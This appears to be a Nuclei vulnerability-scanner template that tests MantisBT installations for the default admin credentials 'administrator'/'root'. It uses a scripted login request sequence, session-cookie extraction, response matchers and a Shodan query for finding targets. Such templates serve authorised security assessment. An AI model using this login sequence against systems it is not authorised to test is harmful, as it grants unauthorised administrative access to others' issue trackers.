id: mantisbt-default-credential

info:
  name: MantisBT Default Admin Login
  author: For3stCo1d,YashVardhanTripathi
  severity: high
  description: A MantisBT default admin login was discovered.
  reference:
    - https://mantisbt.org/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
    shodan-query: title:"MantisBT"
  tags: mantisbt,default-login

http:
  - raw:
      - |
        GET /login_password_page.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login_password_page.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: MANTIS_secure_session=1; PHPSESSID={{session}}
        Content-Type: application/x-www-form-urlencoded

        return=index.php&username={{username}}
      - |
        POST /login_password_page.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: MANTIS_secure_session=1; PHPSESSID={{session}}

        return=index.php&username={{username}}&password={{password}}&secure_session=on
      - |
        GET /my_view_page.php HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      username:
        - administrator
      password:
        - root

    matchers-condition: and
    matchers:
      - type: word
        part: body_4
        words:
          - "View Issues"
          - "Change Log"
        condition: and

      - type: regex
        part: header_3
        regex:
          - "Location: .*?/login_cookie_test.php\\?return=account_page.php"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: session
        internal: true
        group: 1
        part: header
        regex:
          - "PHPSESSID=([a-zA-Z0-9]+);"
# digest: 4a0a00473045022100e9313e62bc97fd81491c8d92e9f909ab7ba4f4c49f1d794199d318339d8311010220459bfd016362968c49d0b207937aae61ac49778a320268a82ecc84f46dd51891:922c64590222798bb761d5b6d8e72950